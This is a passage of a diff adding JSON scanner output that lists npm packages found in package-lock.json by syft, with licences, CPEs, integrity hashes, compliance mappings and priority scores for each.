"HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "982541a2a19fdc52", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: safe-buffer 5.2.1", + "title": "safe-buffer 5.2.1", + "description": "Package discovered: safe-buffer 5.2.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "28135efb01cb74b9", + "name": "safe-buffer", + "version": "5.2.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:safe-buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe-buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe_buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe_buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe:safe-buffer:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safe:safe_buffer:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/safe-buffer@5.2.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "186ed2340219a99c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: safer-buffer 2.1.2", + "title": "safer-buffer 2.1.2", + "description": "Package discovered: safer-buffer 2.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bc8acb243e9d9464", + "name": "safer-buffer", + "version": "2.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:safer-buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safer-buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safer_buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safer_buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safer:safer-buffer:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:safer:safer_buffer:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/safer-buffer@2.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", + "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2ab87631c01bfc3f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: scheduler 0.17.0", + "title": "scheduler 0.17.0", + "description": "Package discovered: scheduler 0.17.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e689757d7bf8470d", + "name": "scheduler", + "version": "0.17.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:scheduler:scheduler:0.17.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/scheduler@0.17.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.17.0.tgz", + "integrity": "sha512-7rro8Io3tnCPuY4la/NuI5F2yfESpnfZyT6TtkXnSWVkcu0BCDJ+8gk5ozUaFaxpIyNuWAPXrH0yFcSi28fnDA==", + "dependencies": { + "loose-envify": "^1.1.0", + "object-assign": "^4.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "bbbd7dd6a8a5a506", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: scheduler 0.23.2", + "title": "scheduler 0.23.2", + "description": "Package discovered: scheduler 0.23.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d0ebbd8a4bc7ada1", + "name": "scheduler", + "version": "0.23.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:scheduler:scheduler:0.23.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/scheduler@0.23.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.23.2.tgz", + "integrity": "sha512-UOShsPwz7NrMUqhR6t0hWjFduvOzbtv7toDH1/hIrfRNIDBnnBWd0CwJTGvTpngVlmwGCdP9/Zl/tVrDqcuYzQ==", + "dependencies": { + "loose-envify": "^1.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "613adae5df8a79db", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: scmp 2.1.0", + "title": "scmp 2.1.0", + "description": "Package discovered: scmp 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "607830ce210254e3", + "name": "scmp", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:scmp:scmp:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/scmp@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/scmp/-/scmp-2.1.0.tgz", + "integrity": "sha512-o/mRQGk9Rcer/jEEw/yw4mwo3EU/NvYvp577/Btqrym9Qy5/MdWGBqipbALgd2lrdWTJ5/gqDusxfnQBxOxT2Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "186e8c930a60e0f6", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: selderee 0.11.0", + "title": "selderee 0.11.0", + "description": "Package discovered: selderee 0.11.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a6fb1c756dcd04fc", + "name": "selderee", + "version": "0.11.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:selderee:selderee:0.11.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/selderee@0.11.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/selderee/-/selderee-0.11.0.tgz", + "integrity": "sha512-5TF+l7p4+OsnP8BCCvSyZiSPc4x4//p5uPwK8TCnVPJYRmU2aYKMpOXvw8zM5a5JvuuCGN1jmsMwuU2W02ukfA==", + "dependencies": { + "parseley": "^0.12.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "809205930987a974", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: semver 7.7.4", + "title": "semver 7.7.4", + "description": "Package discovered: semver 7.7.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "dc47801cc9b2ec78", + "name": "semver", + "version": "7.7.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:npmjs:semver:7.7.4:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/semver@7.7.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.4.tgz", + "integrity": "sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "67469cce48d87167", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: send 0.19.2", + "title": "send 0.19.2", + "description": "Package discovered: send 0.19.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1d81dd407a94f88a", + "name": "send", + "version": "0.19.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:send_project:send:0.19.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/send@0.19.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/send/-/send-0.19.2.tgz", + "integrity": "sha512-VMbMxbDeehAxpOtWJXlcUS5E8iXh6QmN+BkRX1GARS3wRaXEEgzCcB10gTQazO42tpNIya8xIyNx8fll1OFPrg==", + "dependencies": { + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "1.2.0", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "fresh": "~0.5.2", + "http-errors": "~2.0.1", + "mime": "1.6.0", + "ms": "2.1.3", + "on-finished": "~2.4.1", + "range-parser": "~1.2.1", + "statuses": "~2.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3a3b9a5d9af10f0c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: serve-static 1.16.3", + "title": "serve-static 1.16.3", + "description": "Package discovered: serve-static 1.16.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0a7cfe5561f2b18b", + "name": "serve-static", + "version": "1.16.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:serve-static:serve-static:1.16.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:serve-static:serve_static:1.16.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:serve_static:serve-static:1.16.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:serve_static:serve_static:1.16.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:serve:serve-static:1.16.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:serve:serve_static:1.16.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/serve-static@1.16.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/serve-static/-/serve-static-1.16.3.tgz", + "integrity": "sha512-x0RTqQel6g5SY7Lg6ZreMmsOzncHFU7nhnRWkKgWuMTu5NN0DR5oruckMqRvacAN9d5w6ARnRBXl9xhDCgfMeA==", + "dependencies": { + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "parseurl": "~1.3.3", + "send": "~0.19.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules 